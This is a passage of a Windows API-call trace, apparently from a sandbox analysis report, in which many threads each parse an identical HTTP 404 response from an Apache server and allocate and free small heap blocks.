[0202.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 136 os_tid = 0x440 [0203.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.032] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0203.032] GetProcessHeap () returned 0x690000 [0203.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae898 [0203.032] GetProcessHeap () returned 0x690000 [0203.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae898 | out: hHeap=0x690000) returned 1 [0203.032] GetProcessHeap () returned 0x690000 [0203.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 137 os_tid = 0x368 [0203.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.250] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0203.250] GetProcessHeap () returned 0x690000 [0203.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8b0 [0203.250] GetProcessHeap () returned 0x690000 [0203.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8b0 | out: hHeap=0x690000) returned 1 [0203.250] GetProcessHeap () returned 0x690000 [0203.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 Thread: id = 138 os_tid = 0x8ac [0203.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.399] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0203.399] GetProcessHeap () returned 0x690000 [0203.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae8b0 [0203.400] GetProcessHeap () returned 0x690000 [0203.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae8b0 | out: hHeap=0x690000) returned 1 [0203.400] GetProcessHeap () returned 0x690000 [0203.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 Thread: id = 139 os_tid = 0xd3c [0203.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.620] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0203.620] GetProcessHeap () returned 0x690000 [0203.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0203.620] GetProcessHeap () returned 0x690000 [0203.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0203.620] GetProcessHeap () returned 0x690000 [0203.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 Thread: id = 140 os_tid = 0x720 [0203.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.887] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0203.887] GetProcessHeap () returned 0x690000 [0203.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea18 [0203.887] GetProcessHeap () returned 0x690000 [0203.887] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea18 | out: hHeap=0x690000) returned 1 [0203.887] GetProcessHeap () returned 0x690000 [0203.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 Thread: id = 141 os_tid = 0xfe4 [0204.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.051] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.051] GetProcessHeap () returned 0x690000 [0204.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0204.051] GetProcessHeap () returned 0x690000 [0204.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0204.051] GetProcessHeap () returned 0x690000 [0204.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 Thread: id = 142 os_tid = 0x658 [0204.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.227] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.227] GetProcessHeap () returned 0x690000 [0204.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae880 [0204.227] GetProcessHeap () returned 0x690000 [0204.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae880 | out: hHeap=0x690000) returned 1 [0204.227] GetProcessHeap () returned 0x690000 [0204.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 Thread: id = 143 os_tid = 0x1390 [0204.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.426] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.426] GetProcessHeap () returned 0x690000 [0204.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0204.426] GetProcessHeap () returned 0x690000 [0204.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0204.426] GetProcessHeap () returned 0x690000 [0204.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 144 os_tid = 0x13a4 [0204.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.561] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.561] GetProcessHeap () returned 0x690000 [0204.561] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0204.561] GetProcessHeap () returned 0x690000 [0204.561] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0204.561] GetProcessHeap () returned 0x690000 [0204.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 145 os_tid = 0x13a0 [0204.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.842] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0204.842] GetProcessHeap () returned 0x690000 [0204.842] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0204.842] GetProcessHeap () returned 0x690000 [0204.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0204.842] GetProcessHeap () returned 0x690000 [0204.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 146 os_tid = 0x13d0 [0205.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.067] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.067] GetProcessHeap () returned 0x690000 [0205.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0205.067] GetProcessHeap () returned 0x690000 [0205.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0205.068] GetProcessHeap () returned 0x690000 [0205.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 147 os_tid = 0x980 [0205.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.241] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.241] GetProcessHeap () returned 0x690000 [0205.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0205.241] GetProcessHeap () returned 0x690000 [0205.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0205.241] GetProcessHeap () returned 0x690000 [0205.242] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 148 os_tid = 0x4cc [0205.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.436] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.436] GetProcessHeap () returned 0x690000 [0205.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0205.436] GetProcessHeap () returned 0x690000 [0205.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0205.436] GetProcessHeap () returned 0x690000 [0205.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 149 os_tid = 0xdac [0205.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.648] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.648] GetProcessHeap () returned 0x690000 [0205.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeaf0 [0205.648] GetProcessHeap () returned 0x690000 [0205.648] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeaf0 | out: hHeap=0x690000) returned 1 [0205.648] GetProcessHeap () returned 0x690000 [0205.648] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 150 os_tid = 0x89c [0205.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.936] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0205.936] GetProcessHeap () returned 0x690000 [0205.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0205.936] GetProcessHeap () returned 0x690000 [0205.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0205.936] GetProcessHeap () returned 0x690000 [0205.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 151 os_tid = 0xe98 [0206.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.139] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0206.139] GetProcessHeap () returned 0x690000 [0206.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0206.139] GetProcessHeap () returned 0x690000 [0206.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0206.139] GetProcessHeap () returned 0x690000 [0206.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 152 os_tid = 0x928 [0206.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.303] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0206.303] GetProcessHeap () returned 0x690000 [0206.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0206.303] GetProcessHeap () returned 0x690000 [0206.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0206.303] GetProcessHeap () returned 0x690000 [0206.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 153 os_tid = 0x3bc [0206.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.601] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0206.601] GetProcessHeap () returned 0x690000 [0206.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0206.601] GetProcessHeap () returned 0x690000 [0206.601] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0206.826] GetProcessHeap () returned 0x690000 [0206.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 154 os_tid = 0x684 [0207.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.562] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0207.562] GetProcessHeap () returned 0x690000 [0207.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0207.562] GetProcessHeap () returned 0x690000 [0207.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0207.562] GetProcessHeap () returned 0x690000 [0207.563] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 155 os_tid = 0x320 [0207.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.750] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0207.750] GetProcessHeap () returned 0x690000 [0207.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0207.750] GetProcessHeap () returned 0x690000 [0207.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0207.751] GetProcessHeap () returned 0x690000 [0207.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 156 os_tid = 0x8e0 [0207.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.955] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0207.955] GetProcessHeap () returned 0x690000 [0207.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0207.955] GetProcessHeap () returned 0x690000 [0207.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0207.955] GetProcessHeap () returned 0x690000 [0207.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 157 os_tid = 0x1334 [0208.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.148] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.148] GetProcessHeap () returned 0x690000 [0208.148] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0208.148] GetProcessHeap () returned 0x690000 [0208.148] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0208.148] GetProcessHeap () returned 0x690000 [0208.149] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 158 os_tid = 0x680 [0208.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.346] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.346] GetProcessHeap () returned 0x690000 [0208.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0208.346] GetProcessHeap () returned 0x690000 [0208.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0208.346] GetProcessHeap () returned 0x690000 [0208.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 159 os_tid = 0x314 [0208.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.545] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.545] GetProcessHeap () returned 0x690000 [0208.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0208.545] GetProcessHeap () returned 0x690000 [0208.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0208.545] GetProcessHeap () returned 0x690000 [0208.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 160 os_tid = 0xb84 [0208.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.792] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0208.792] GetProcessHeap () returned 0x690000 [0208.792] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0208.792] GetProcessHeap () returned 0x690000 [0208.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0208.792] GetProcessHeap () returned 0x690000 [0208.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 161 os_tid = 0x630 [0209.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.056] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0209.056] GetProcessHeap () returned 0x690000 [0209.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0209.056] GetProcessHeap () returned 0x690000 [0209.056] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0209.056] GetProcessHeap () returned 0x690000 [0209.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 162 os_tid = 0xc74 [0209.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.266] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0209.266] GetProcessHeap () returned 0x690000 [0209.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0209.266] GetProcessHeap () returned 0x690000 [0209.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0209.267] GetProcessHeap () returned 0x690000 [0209.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 163 os_tid = 0xeec [0209.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.579] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0209.579] GetProcessHeap () returned 0x690000 [0209.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0209.579] GetProcessHeap () returned 0x690000 [0209.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0209.579] GetProcessHeap () returned 0x690000 [0209.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 164 os_tid = 0x62c [0209.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.814] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0209.814] GetProcessHeap () returned 0x690000 [0209.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0209.814] GetProcessHeap () returned 0x690000 [0209.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0209.814] GetProcessHeap () returned 0x690000 [0209.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 165 os_tid = 0xfd4 [0210.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.070] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.070] GetProcessHeap () returned 0x690000 [0210.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0210.070] GetProcessHeap () returned 0x690000 [0210.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0210.070] GetProcessHeap () returned 0x690000 [0210.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 166 os_tid = 0xa8c [0210.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.331] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.331] GetProcessHeap () returned 0x690000 [0210.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0210.331] GetProcessHeap () returned 0x690000 [0210.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 